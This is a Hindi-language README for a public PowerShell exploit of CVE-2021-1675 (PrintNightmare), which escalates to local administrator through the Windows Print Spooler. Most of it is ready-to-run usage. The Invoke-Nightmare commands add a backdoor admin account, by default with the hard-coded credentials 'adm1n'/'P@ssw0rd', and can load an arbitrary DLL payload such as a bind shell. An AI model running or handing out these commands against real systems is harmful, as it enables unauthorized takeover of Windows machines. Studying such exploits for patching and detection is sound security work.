
PowerShell एक्सप्लॉइट CVE-2021-1675 (PrintNightmare) के लिए जो Print Spooler के माध्यम से स्थानीय व्यवस्थापक समूह में एक उपयोगकर्ता जोड़कर स्थानीय विशेषाधिकार वृद्धि करता है।
Caleb Stewart | John Hammond | July 1, 2021
CVE-2021-1675 एक गंभीर रिमोट कोड एक्ज़ीक्यूशन और स्थानीय विशेषाधिकार वृद्धि भेद्यता है, जिसे "PrintNightmare" नाम दिया गया है।
प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट (Python, C++) रिमोट कोड एक्ज़ीक्यूशन क्षमता के लिए जारी किए गए हैं, और स्थानीय विशेषाधिकार वृद्धि के लिए एक C# संस्करण भी जारी किया गया है। हमने शुद्ध PowerShell में कोई मूल कार्यान्वयन नहीं देखा था, और हम एक्सप्लॉइट को परिष्कृत और पुनर्निर्मित करने का प्रयास करना चाहते थे।
यह PowerShell स्क्रिप्ट PrintNightmare आक्रमण तकनीक के साथ स्थानीय विशेषाधिकार वृद्धि (LPE) करती है।

यह Windows Server 2016 और Windows Server 2019 पर परीक्षण किया गया है।
डिफ़ॉल्ट रूप से स्थानीय व्यवस्थापक समूह में एक नया उपयोगकर्ता जोड़ें:
Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare # add user `adm1n`/`P@ssw0rd` in the local admin group by default
Invoke-Nightmare -DriverName "Xerox" -NewUser "john" -NewPassword "SuperSecure"
अपनी पसंद का कुछ भी करने के लिए एक कस्टम DLL पेलोड प्रदान करें।
Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare -DLL "C:\absolute\path\to\your\bindshell.dll"